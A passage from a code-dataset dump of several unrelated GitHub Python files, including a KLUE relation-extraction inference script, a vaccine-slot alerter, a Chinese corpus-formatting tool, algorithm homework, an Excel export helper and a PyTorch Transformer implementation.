0:\n                    idx_prob[i] = min(fold_per_prob[idx]) / 12\n            final_output_prob[idx] = idx_prob\n\n    return final_output_pred, final_output_prob\n\n\ndef num_to_label(label):\n    \"\"\"\n    Convert the numeric classes back to their original string labels.\n    \"\"\"\n    origin_label = []\n    with open(\"dict_num_to_label.pkl\", \"rb\") as f:\n        dict_num_to_label = pickle.load(f)\n    for v in label:\n        origin_label.append(dict_num_to_label[v])\n\n    return 
origin_label\n\n\ndef load_test_dataset(dataset_dir, tokenizer, sen_preprocessor, entity_preprocessor):\n    \"\"\"\n    Load the test dataset,\n    then tokenize it.\n    \"\"\"\n    test_dataset = load_data(dataset_dir, train=False)\n    test_dataset = preprocessing_dataset(\n        test_dataset, sen_preprocessor, entity_preprocessor\n    )\n    test_label = list(map(int, test_dataset[\"label\"].values))\n\n    # tokenizing dataset\n    tokenized_test = tokenized_dataset(test_dataset, tokenizer, is_inference=True)\n    return test_dataset[\"id\"], tokenized_test, test_label\n\n\ndef select_checkpoint(args):\n    models_dir = args.model_dir\n    dirs = os.listdir(models_dir)\n    dirs = sorted(dirs)\n\n    for i, d in enumerate(dirs, 0):\n        print(\"(%d) %s\" % (i, d))\n    d_idx = input(\"Select directory you want to load: \")\n\n    checkpoint_dir = os.path.abspath(os.path.join(models_dir, dirs[int(d_idx)]))\n    print(\"checkpoint_dir is: {}\".format(checkpoint_dir))\n\n    return checkpoint_dir\n\n\ndef main(args):\n    \"\"\"\n    Runs inference on any file that has the same format as the given dataset csv file.\n    \"\"\"\n    device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n    # load tokenizer\n    tokenizer = AutoTokenizer.from_pretrained(args.PLM)\n\n    # load my model\n    model_dir = select_checkpoint(args)\n\n    # load test dataset\n    test_dataset_dir = \"/opt/ml/dataset/test/test_data.csv\"\n\n    # preprocessor\n    sen_preprocessor = SenPreprocessor(args.preprocessing_cmb, args.mecab_flag)\n    entity_preprocessor = EntityPreprocessor(\n        args.entity_flag if args.model_name != \"Rroberta\" else True\n    )\n\n    if args.PLM in [\"klue/roberta-base\", \"klue/roberta-small\", \"klue/roberta-large\"]:\n        is_roberta = True\n        if args.add_unk_token:\n            print(model_dir + \"/tokenizer\")\n            tokenizer = BertTokenizer.from_pretrained(model_dir + \"/tokenizer\")\n            print(\n                \"new vocab size:\",\n                len(tokenizer.vocab) + len(tokenizer.get_added_vocab()),\n            )\n    else:\n        is_roberta = False\n\n    test_id, test_dataset, test_label = load_test_dataset(\n        test_dataset_dir, tokenizer, sen_preprocessor, entity_preprocessor\n    )\n    Re_test_dataset = (\n        RE_Dataset(test_dataset, test_label)\n        if args.model_name != \"Rroberta\"\n        else DatasetForRRoBERTa(test_dataset, test_label, tokenizer)\n    )\n\n    if args.model_type:\n        pred_answer, output_prob = inference_three_step(\n            model_dir, Re_test_dataset, device, args, is_roberta\n        )  # infer classes with the model\n        pred_answer = num_to_label(pred_answer)\n\n    elif args.k_fold:\n        pred_answer, output_prob = inference_ensemble(\n            model_dir, Re_test_dataset, device, args, is_roberta\n        )  # infer classes with the model\n        pred_answer = np.mean(pred_answer, axis=0)\n        pred_answer = np.argmax(pred_answer, axis=-1)\n        pred_answer = num_to_label(pred_answer)\n        output_prob = np.mean(output_prob, axis=0).tolist()\n\n    else:\n        if args.model_name is not None:\n            model_config = AutoConfig.from_pretrained(args.PLM)\n            model_config.num_labels = 30\n            mm = importlib.import_module(\"model\")\n            MyModel = getattr(mm, args.model_name)\n\n            if MyModel.__name__ == \"ConcatFourClsModel\":\n                model_config.update({\"output_hidden_states\": True})\n\n            model = MyModel(args.PLM, config=model_config)\n            model.load_state_dict(\n                torch.load(os.path.join(model_dir, \"pytorch_model.pt\"))\n            )\n        else:\n            model = AutoModelForSequenceClassification.from_pretrained(model_dir)\n        model.parameters\n        model.to(device)\n\n        pred_answer, output_prob = inference(\n            model, Re_test_dataset, device, args, is_roberta\n        )  # infer classes with the model\n        pred_answer = num_to_label(pred_answer)  # convert the numeric classes back to the original string labels.\n\n    # make csv file with predicted answer\n    
#########################################################\n    # please keep the directory and column format below unchanged.\n    output = pd.DataFrame(\n        {\n            \"id\": test_id,\n            \"pred_label\": pred_answer,\n            \"probs\": output_prob,\n        }\n    )\n\n    sub_name = model_dir.split(\"/\")[-1]\n    # save the final predicted labels as a csv file.\n    output.to_csv(f\"./prediction/submission_{sub_name}.csv\", index=False)\n    #### required!! ##############################################\n    print(\"---- Finish! ----\")\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n\n    # model dir\n    parser.add_argument(\"--model_dir\", type=str, default=\"./best_models\")\n    parser.add_argument(\n        \"--PLM\", type=str, help=\"model type (example: klue/bert-base)\", required=True\n    )\n    parser.add_argument(\n        \"--entity_flag\",\n        default=False,\n        action=\"store_true\",\n        help=\"same as used for training (default: False)\",\n    )\n    parser.add_argument(\n        \"--preprocessing_cmb\", nargs=\"+\", help=\"<Required> Set flag (example: 0 1 2)\"\n    )\n    parser.add_argument(\n        \"--mecab_flag\",\n        default=False,\n        action=\"store_true\",\n        help=\"same as used for training (default: False)\",\n    )\n    parser.add_argument(\n        \"--add_unk_token\",\n        default=False,\n        action=\"store_true\",\n        help=\"add unknown token in vocab (default: False)\",\n    )\n    parser.add_argument(\"--k_fold\", type=int, default=0, help=\"not k fold (default: 0)\")\n    parser.add_argument(\n        \"--model_name\",\n        type=str,\n        default=None,\n        help=\"if wanted, enter your model class name\",\n    )\n    parser.add_argument(\n        \"--model_type\",\n        default=False,\n        action=\"store_true\",\n        help=\"(default: False - no coarse/fine classification)\",\n    )\n\n    args = parser.parse_args()\n    print(args)\n\n    os.makedirs(\"./prediction\", exist_ok=True)\n    main(args)\n","repo_name":"boostcampaitech2/klue-level2-nlp-02","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":16417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25269713292","text":"import requests\nimport json\nfrom datetime import datetime, timedelta\nimport time\nfrom playsound import playsound\n\ndate = f\"{datetime.now()+timedelta(days = 1) :%d-%m-%Y}\"\npincodes = [ 411001, 411007, 411017, 411018, 411027, 411033, 411034 ]\n\napi = 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/calendarByDistrict?district_id=363&date='+date\nheaders={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\nprint(api)\ncount = 0\nerror_count = 0\nstart = time.time()\nwhile True:\n    try:\n        response = requests.get(api, headers=headers).json()\n        for center in response['centers']:\n            for session in center['sessions']:\n                if session['min_age_limit'] == 18 and session['available_capacity'] > 0:\n                    print(center['name'])\n                    print(center['address'])\n                    print(session['available_capacity'])\n                    playsound('S:\\\\Projects\\\\vaccine-alert\\\\alarm.wav')\n    except Exception as e:\n        error_count += 1\n        print(e, error_count)\n    count += 1\n    if count%100 == 0:\n        print(count, 'times run, last batch took', int(time.time()-start), 'seconds')\n        start = time.time()","repo_name":"sudheendrakatikar/vaccine-alerter","sub_path":"alerter.py","file_name":"alerter.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41649217299","text":"import codecs\nimport jieba\nimport jieba.posseg as pseg\nimport random\n\nclass CorpusFormat(object):\n\n    relation_table = 
{\"cs-ef\":0,\"ef-cs\":1,\n \"identity\":2,\n \"way-obj\":3,\"obj-way\":4,\n \"en-or\":5,\"or-en\":6,\n \"other\":7,\n \"loc-aA\":8,\"loc-Aa\":9,\n \"clsaA\":10,\"clsAa\":11,\n \"w-c\":12,\"c-w\":13,\n \"related\":14,\n \"pdr-pdt\":15,\"pdt-pdr\":16,\n \"ag-ins\":17,\"ins-ag\":18,\n \"med-ill\":19,\"ill-med\":20,\n \"top-msg\":21,\"msg-top\":21\n }\n\n def freq_tag(self,word):\n freq = jieba.get_FREQ(word)\n tag = \"\"\n if freq is not None:\n tag = pseg.lcut(word,HMM=False)[0].flag\n return freq,tag\n\n def recover_dict(self,word,freq,tag):\n if freq is None:\n jieba.del_word(word)\n else:\n jieba.add_word(word, freq=freq, tag=tag)\n\n def word_divide(self,inputfiles,outputfile):\n outputs = []\n relations = {}\n for file in inputfiles:\n with codecs.open(file,\"r\",\"utf8\") as read:\n lines = read.readlines()\n for line in lines:\n if line == \"\\n\":\n continue\n line = line.replace(\"<Entity>\", \"\")\n line = line.replace(\"</Entity>\", \"\")\n line = line.replace(\"<kej>\", \"\")\n line = line.replace(\"</kej>\", \"\")\n line = line.replace(\" \",\"\").strip()\n temps = line.split(\"\\t\")\n if len(temps)!=4:\n print(\"wrong\")\n relation = temps[0]\n entity1 = temps[1]\n freq1,tag1 = self.freq_tag(entity1)\n jieba.add_word(entity1,freq = 1000000,tag = \"kej\")\n entity2 = temps[2]\n freq2, tag2 = self.freq_tag(entity2)\n jieba.add_word(entity2, freq=1000000, tag=\"kej\")\n words = jieba.lcut(temps[3])\n sentence = \"\"\n # sentence_label = \"\"\n seq1 = []\n seq2 = []\n pos1 = \"\"\n pos2 = \"\"\n for word in words:\n if word == \" \":\n continue\n sentence += word\n sentence += \" \"\n sentence = sentence.strip()\n words = sentence.split(\" \")\n for i in range(len(words)):\n if words[i] == entity1:\n seq1.append(i)\n if words[i] == entity2:\n seq2.append(i)\n for item in seq1:\n pos1 += (str(item) + \" \")\n for item in seq2:\n pos2 += (str(item) + \" \")\n pos1 = pos1.strip()\n pos2 = pos2.strip()\n sentence = sentence\n # sentence_label = sentence_label.strip()\n if pos1 == \"\" or pos2 == \"\":\n print(\"分词错误\" + entity1,entity2,sentence)\n else:\n if relation not in relations:\n relations[relation] = 1\n else:\n relations[relation] += 1\n outputs.append(relation + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n self.recover_dict(entity1,freq1,tag1)\n self.recover_dict(entity2, freq2, tag2)\n print(relations)\n with codecs.open(outputfile,\"w\",\"utf8\") as file:\n file.writelines(outputs)\n\n\n def change_order(self,inputfile,outputfile):\n outputs = []\n with codecs .open(inputfile,\"r\",\"utf8\") as file:\n lines = file.readlines()\n for line in lines:\n temps = line.split(\"\\t\")\n if len(temps) != 4:\n print(\"wrong\")\n relation = temps[0]\n pos1 = temps[1]\n pos2 = temps[2]\n sentence = temps[3].strip()\n if relation == \"cause-effect\":\n outputs.append(\"cs-ef\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"ef-cs\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"cs-ef\":\n outputs.append(\"cs-ef\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"ef-cs\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"classify\":\n outputs.append(\"clsaA\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"clsAa\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"identity\":\n outputs.append(\"idnetity\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" 
+ sentence + \"\\n\")\n elif relation == \"way-obj\":\n outputs.append(\"way-obj\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"obj-way\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"en-or\":\n outputs.append(\"en-or\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"or-en\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"other\":\n outputs.append(\"other\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"other\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"location\":\n outputs.append(\"locaA\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"locAa\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"w-c\":\n outputs.append(\"w-c\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"c-w\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"related\":\n outputs.append(\"related\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"prdcr-prdct\":\n outputs.append(\"pdr-pdt\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"pdt-pdr\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"ag-ins\":\n outputs.append(\"ag-ins\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"ins-ag\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"med-ill\":\n outputs.append(\"med-ill\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"ill-med\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"top-msg\":\n outputs.append(\"top-msg\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"msg-top\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n with codecs.open(outputfile,\"w\",\"utf8\") as file:\n file.writelines(outputs)\n def merge_files(self,files,outputfile):\n outputs = []\n for file in files:\n with codecs.open(file,\"r\",\"utf8\") as read:\n lines = read.readlines()\n outputs.extend(lines)\n print(len(outputs))\n with codecs.open(outputfile,\"w\",\"utf8\") as file:\n file.writelines(outputs)\n\n def extract_relation_type(self,inputfile,outputfile):\n relations = {}\n outputs = []\n with codecs.open(inputfile, \"r\", \"utf8\") as read:\n lines = read.readlines()\n for line in lines:\n temps = line.split(\"\\t\")\n if len(temps) != 4:\n print(\"wrong\")\n relation = temps[0]\n pos1 = temps[1]\n pos2 = temps[2]\n sentence = temps[3].strip()\n outputs.append([relation,relation + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\"])\n if relation not in relations:\n relations[relation] = 1\n else:\n relations[relation] += 1\n output_items = []\n sentences = []\n for key,value in relations.items():\n if value>20:\n output_items.append(key)\n for item in outputs:\n if item[0] in output_items:\n sentences.append(item[1])\n else:\n print(item[0])\n print(len(sentences))\n with codecs.open(outputfile,\"w\",\"utf8\") as file:\n file.writelines(sentences)\n def train_test(self,files,trainfile,testfile):\n trains = []\n tests = []\n for file in files:\n with codecs.open(file, \"r\", \"utf8\") as read:\n lines = read.readlines()\n total = 
len(lines)\n                print(total)\n                test = random.sample(lines, int(total / 4))\n                for item in test:\n                    lines.remove(item)\n                print(len(test))\n                print(len(lines))\n                trains.extend(lines)\n                tests.extend(test)\n        print(str(len(trains)) + \" \" + str(len(tests)))\n        with codecs.open(trainfile, \"w\", \"utf8\") as wrt:\n            wrt.writelines(trains)\n        with codecs.open(testfile, \"w\", \"utf8\") as wrt:\n            wrt.writelines(tests)\n\ncf = CorpusFormat()\n# cf.word_divide([\"../训练语料/zhiliao2.txt\"],\"../训练语料/zhiliao2_outputs.txt\")\ncf.train_test([\"train_all2.txt\"],\"../files/train.txt\",\"../files/test.txt\")\n# cf.word_divide([\"/home/hunter/PycharmProjects/corpus_extraction/处理后语料/部分整体.txt\"],\"./output_whole.txt\")\n# cf.change_order(\"../训练语料/zhiliao2_outputs.txt\",\"../训练语料/zhiliao2_divides.txt\")\n# cf.merge_files([\"divides.txt\",\"divide_cause.txt\",\"divide_classify.txt\",\"divide_whole.txt\",\"divide_zhiliao.txt\",\"train_locAa.txt\",\"train_locaA.txt\",\"train_other.txt\"],\"samples_all.txt\")\n# cf.extract_relation_type(\"samples_all.txt\",\"train_all2.txt\")\n# cf.merge_files([\"../训练语料/zhiliao2_divides.txt\",\"../训练语料/train_all.txt\"],\"samples_all.txt\")","repo_name":"runqitian/kej_cnn_model","sub_path":"crps/corpus_format.py","file_name":"corpus_format.py","file_ext":"py","file_size_in_byte":10735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5192613156","text":"\"\"\" \nDyachenko Daniil\nAlgorithms and data structures in Python.\nHomework for lesson 3.\n\nIn the range of natural numbers from 2 to 99, determine how many of them are multiples of each of the numbers in the range from 2 to 9.\nIn a second array, store the indices of the even elements of the first array. For example, given an array with the values 8, 3, 15, 6, 4, 2, the second array should be filled with the values 1, 4, 5, 6 (or 0, 3, 4, 5 - if indexing starts at zero), since those are the positions of the even numbers in the first array.\nIn an array of random integers, swap the minimum and maximum elements.\nDetermine which number occurs most often in the array.\nFind the maximum negative element in the array. Print its value and its position in the array.\nIn a one-dimensional array, find the sum of the elements located between the minimum and maximum elements. Do not include the minimum and maximum elements themselves in the sum.\nIn a one-dimensional array of integers, determine the two smallest elements. They can either be equal to each other (both being minimal) or differ.\nA 5x4 matrix is filled from keyboard input except for the last element of each row. The program must compute the sum of the entered elements of each row and write it into the last cell of the row. Finally, print the resulting matrix.\nFind the maximum element among the minimum elements of the columns of the matrix. Note. 
Solve 6 of the 9 problems that you find interesting (flowcharts were only required in the first lesson; in this and the following practical assignments their use is optional)\n\"\"\"\nfrom random import randint\n\n# HW3.1 done\n\nl = [randint(2,100) for x in range(50)]\n\nb = 0\nfor j in range(2,10):\n    for i in range(len(l)):\n        if l[i] % j == 0:\n#            print(j)\n            b += 1\n    print(j, \"divides\", b, \"numbers\")\n    b = 0\n\n\n\n# HW3.2 done\n\nl = [randint(0,100) for x in range(50)]\nprint(l)\nn = []\nfor i in range(50):\n    if l[i] % 2 == 0:\n        n.append(i)\nprint(n)\n\n\n\n# HW3.3 done\n\nl = [randint(0,1000) for x in range(50)]\nprint(\"Index of the minimum value - \", l.index(min(l)), \"Value - \", min(l))\nprint(\"Index of the maximum value - \", l.index(max(l)), \"Value - \", max(l))\n\na, b = l[l.index(min(l))], l[l.index(max(l))]\nl[l.index(max(l))], l[l.index(min(l))] = a, b\n# l[l.index(min(l))], l[l.index(max(l))] = l[l.index(max(l))], l[l.index(min(l))]\n\nprint(\"Index of the minimum value - \", l.index(min(l)), \"Value - \", min(l))\nprint(\"Index of the maximum value - \", l.index(max(l)), \"Value - \", max(l))\n\n\n# HW3.4.1\n# The dictionary-based solution didn't work out. Didn't get as far as extracting the key.\nl = [randint(1,100) for x in range(50)]\nn = dict.fromkeys(l,0)\na = 0\nfor i in n.keys():\n    for j in l:\n        if i == j:\n            n[i] = n[i] + 1\nprint(max(n.values()))\n\n\n\n# HW3.4 done\nl = [randint(1,100) for x in range(50)]\ncount_max = 0\nfor i in range(len(l)):\n    count = 0\n    for j in range(len(l)):\n        if l[i] == l[j]:\n            count += 1 \n    if count > count_max:\n        count_max = count\n        x = l[i]\nprint(x, \"occurs\", count_max, \"times\")\n\n\n\n# HW3.5 done\n\nl = [randint(-50,50) for x in range(50)]\n#print(l) \nc = min(l)\nfor i in range(len(l)):\n    if l[i] < 0 :\n        b = l[i]\n        if c < b:\n            c = b\n#            print(c)\nprint(c) \n\n\n\n# hw 3.8 done\n\n#matrix = [ [ randint(1,100) for i in range(4)] for i in range(4)]\nmatrix = [ [ int(input(\"..\")) for i in range(4)] for i in range(4)]\nfor i in range(4):\n    \n    print(*matrix[i], \" sum = \", end=\"\")\n    print(sum(matrix[i]))\n\n\n# hw 3.9 done\n\na = 8\nmatrix = [ [ randint(1,100) for i in range(a)] for i in range(a)]\n\n# rotate = list(map(list, zip(*matrix)))\nresult = 0\nfor x in range(len(matrix)):\n    n = matrix[0][x]\n    for i in range(1,len(matrix)):\n        if n > matrix[i][x]:\n            n = matrix[i][x]\n    print(n)\n    \n    if result < n:\n        result = n\nprint(result)","repo_name":"daniilstv/GB_algorithms","sub_path":"alg_hw3.py","file_name":"alg_hw3.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24372896882","text":"import openpyxl,time,os\r\n\r\ndef export_data(res,page_start,page_end):\r\n    wb = openpyxl.Workbook()\r\n    sheet = wb.create_sheet(title=\"result\", index=0)\r\n    header = [\"Protein\",\"Gene\",\"UniProt\",\"PDBe-KB\",\"Biological function\",\"Url\"]\r\n    \r\n    sheet.append(header)\r\n    for item in res:\r\n        for h in header:\r\n            if h not in item:\r\n                item[h] = ''\r\n        sheet.append(\r\n            [item['Protein'],\r\n            item['Gene'],\r\n            item['UniProt'],\r\n            item['PDBe-KB'],\r\n            item['Biological function'],\r\n            item['Url'],\r\n            ])\r\n    out_path = \"out/out_{}_{}_{}.xlsx\".format(page_start,page_end,str(time.time()* 1000))\r\n    wb.save(out_path)\r\n    openFilePath = 'explorer /e,/select,{}'.format(os.path.abspath(out_path))\r\n    os.popen(openFilePath)\r\n    return 
os.path.abspath(out_path)","repo_name":"Zsk-d/get-gene","sub_path":"export_data.py","file_name":"export_data.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31079480995","text":"class Solution:\n    def maxProfit(self, prices: List[int]) -> int:\n        dp = dict()\n        \n        def getProfit(i,buying):\n            \n            if i>=len(prices):\n                return 0\n            \n            if (i,buying) in dp:\n                return dp[(i,buying)]\n            \n            skip = getProfit(i+1,buying)\n            if buying:\n                buy = getProfit(i+1,not buying) - prices[i]\n                dp[(i,buying)] = max(skip,buy)\n            else:\n                sell = getProfit(i+1,not buying) + prices[i]\n                dp[(i,buying)] = max(skip,sell)\n            return dp[(i,buying)]\n        \n        return getProfit(0,True)","repo_name":"Merwan-J/competetive-programming","sub_path":"122-best-time-to-buy-and-sell-stock-ii/122-best-time-to-buy-and-sell-stock-ii.py","file_name":"122-best-time-to-buy-and-sell-stock-ii.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40894096702","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math, copy, time\nfrom torch.autograd import Variable\nimport pdb\nimport pickle\n\nclass EncoderDecoder(nn.Module):\n\n    def __init__(self, encoder, decoder, src_embed, tgt_embed, generator):\n        super(EncoderDecoder, self).__init__()\n        self.encoder = encoder  # encoder\n        self.decoder = decoder  # decoder\n        self.src_embed = src_embed  # input embedding\n        self.tgt_embed = tgt_embed  # output embedding\n        self.generator = generator  # linear + softmax applied after the output\n\n    def forward(self, src, tgt, src_mask, tgt_mask):\n        \"Take in and process the source sequence, the target sequence, and their masks\"\n        return self.decode(self.encode(src, src_mask), src_mask, tgt, tgt_mask)\n\n    def encode(self, src, src_mask):\n        return self.encoder(self.src_embed(src), src_mask)\n        # the encoder works on the input embedding and its mask.\n\n    def decode(self, memory, src_mask, tgt, tgt_mask):\n        return self.decoder(self.tgt_embed(tgt), memory, src_mask, tgt_mask)\n        # the decoder needs not only the target embedding and its mask but also the encoder output\n\nclass Generator(nn.Module):\n    \"Define the standard linear + softmax generation step\"\n    def __init__(self, d_model, vocab):\n        super(Generator, self).__init__()\n        self.proj = nn.Linear(d_model, vocab)\n\n    def forward(self, x):\n        return F.log_softmax(self.proj(x), dim=-1)\n\n\n# Encoder part\ndef clones(module, N):\n    \"Produce N identical layers\"\n    return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\nclass Encoder(nn.Module):\n    \"\"\"Encoder made of a stack of N layers\"\"\"\n\n    def __init__(self, layer, N,d_model, vocab_size):\n        super(Encoder, self).__init__()\n        self.layers = clones(layer, N)\n        self.norm = LayerNorm(layer.size)\n        # self.proj = nn.Linear(d_model, vocab_size)\n\n    def forward(self, x, mask):\n        \"Pass the input and its mask through each layer in turn\"\n        # break_probs = []\n        group_prob = 0\n        for layer in self.layers:\n            x, group_prob = layer(x, mask, group_prob)\n            # break_probs.append(break_prob)\n        x = self.norm(x)\n        # break_probs = torch.stack(break_probs, dim=1)\n        return x\n\nclass LayerNorm(nn.Module):\n    \"\"\"Construct a layernorm module\"\"\"\n\n    def __init__(self, features, eps=1e-6):\n        super(LayerNorm, self).__init__()\n        self.a_2 = nn.Parameter(torch.ones(features))\n        self.b_2 = nn.Parameter(torch.zeros(features))\n        self.eps = eps\n\n    def forward(self, x):\n        \"Norm\"\n        mean = x.mean(-1, keepdim=True)\n        std = x.std(-1, keepdim=True)\n        return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass SublayerConnection(nn.Module):\n    \"\"\"Add+Norm\"\"\"\n\n    def __init__(self, size, dropout):\n        
super(SublayerConnection, self).__init__()\n        self.norm = LayerNorm(size)\n        self.dropout = nn.Dropout(dropout)\n\n    def forward(self, x, sublayer):\n        \"add norm\"\n        return x + self.dropout(sublayer(self.norm(x)))\n\n\nclass EncoderLayer(nn.Module):\n    \"\"\"An encoder layer consists of two sublayers: self-attn and feed forward\"\"\"\n\n    def __init__(self, size, self_attn, feed_forward,group_attn, dropout):\n        super(EncoderLayer, self).__init__()\n        self.self_attn = self_attn\n        self.feed_forward = feed_forward\n        self.group_attn = group_attn\n        self.sublayer = clones(SublayerConnection(size, dropout), 2)\n        self.size = size\n\n    def forward(self, x, mask,group_prob):\n        \"Self-attn followed by feed forward\"\n        group_prob = self.group_attn(x, mask, group_prob)\n        x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, group_prob,mask))\n        return self.sublayer[1](x, self.feed_forward), group_prob\n\n\n# Decoder part\nclass Decoder(nn.Module):\n    \"\"\"Generic decoder structure with masking\"\"\"\n\n    def __init__(self, layer, N):\n        super(Decoder, self).__init__()\n        self.layers = clones(layer, N)\n        self.norm = LayerNorm(layer.size)\n\n    def forward(self, x, memory, src_mask, tgt_mask):\n        for layer in self.layers:\n            x = layer(x, memory, src_mask, tgt_mask)\n        return self.norm(x)\n\n\nclass DecoderLayer(nn.Module):\n    \"\"\"Decoder is made of self-attn, src-attn, and feed forward\"\"\"\n\n    def __init__(self, size, self_attn, src_attn, feed_forward, dropout):\n        super(DecoderLayer, self).__init__()\n        self.size = size\n        self.self_attn = self_attn\n        self.src_attn = src_attn\n        self.feed_forward = feed_forward\n        self.sublayer = clones(SublayerConnection(size, dropout), 3)\n\n    def forward(self, x, memory, src_mask, tgt_mask):\n        \"Chain the decoder's three sublayers together\"\n        m = memory\n        x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))\n        x = self.sublayer[1](x, lambda x: self.src_attn(x, m, m, src_mask))\n        return self.sublayer[2](x, self.feed_forward)\n\n\ndef subsequent_mask(size):\n    \"\"\"\n    Mask subsequent positions; returns a [size, size] lower-triangular tensor\n    with ones on and below the diagonal and zeros above it\n    \"\"\"\n    attn_shape = (1, size, size)\n    subsequent_mask = np.triu(np.ones(attn_shape), k=1).astype('uint8')\n    return torch.from_numpy(subsequent_mask) == 0\n\n\n# Attention\ndef attention(query, key, value, mask=None, dropout=None,group_prob=None):\n    \"Compute the attention weights and their dot product with V\"\n    d_k = query.size(-1)\n    # [B, h, L, L]\n    scores = torch.matmul(query, key.transpose(-2, -1)) \\\n             / math.sqrt(d_k)\n    if mask is not None:\n        seq_len = query.size()[-2]\n        b = torch.from_numpy(np.diag(np.ones(seq_len, dtype=np.int32), 0)).cuda()\n        # b = torch.from_numpy(np.diag(np.ones(seq_len, dtype=np.int32), 0))\n        scores = scores.masked_fill((mask.long() | b.bool()) == 0, -1e9)\n\n    if group_prob is not None:\n        p_attn = F.softmax(scores, dim=-1)\n        p_attn = p_attn * group_prob.unsqueeze(1).float()\n    else:\n        p_attn = F.softmax(scores, dim=-1)\n    if dropout is not None:\n        p_attn = dropout(p_attn)\n    return torch.matmul(p_attn, value), p_attn\n\n\nclass MultiHeadedAttention(nn.Module):\n    def __init__(self, h, d_model, dropout=0.1):\n        \"Take in model size and number of heads.\"\n        super(MultiHeadedAttention, self).__init__()\n        assert d_model % h == 0\n        self.d_k = d_model // h\n        self.h = h\n        self.linears = clones(nn.Linear(d_model, d_model), 4)\n        self.attn = None\n        self.dropout = nn.Dropout(p=dropout)\n\n    def forward(self, query, key, value, group_prob=None,mask=None):\n        \"\"\"\n        Implements MultiHeadedAttention.\n        The input q, k, v have shape [batch, L, d_model].\n        The output x has the same shape.\n        \"\"\"\n        if mask is not None:\n            # Same mask applied to all h heads.\n            
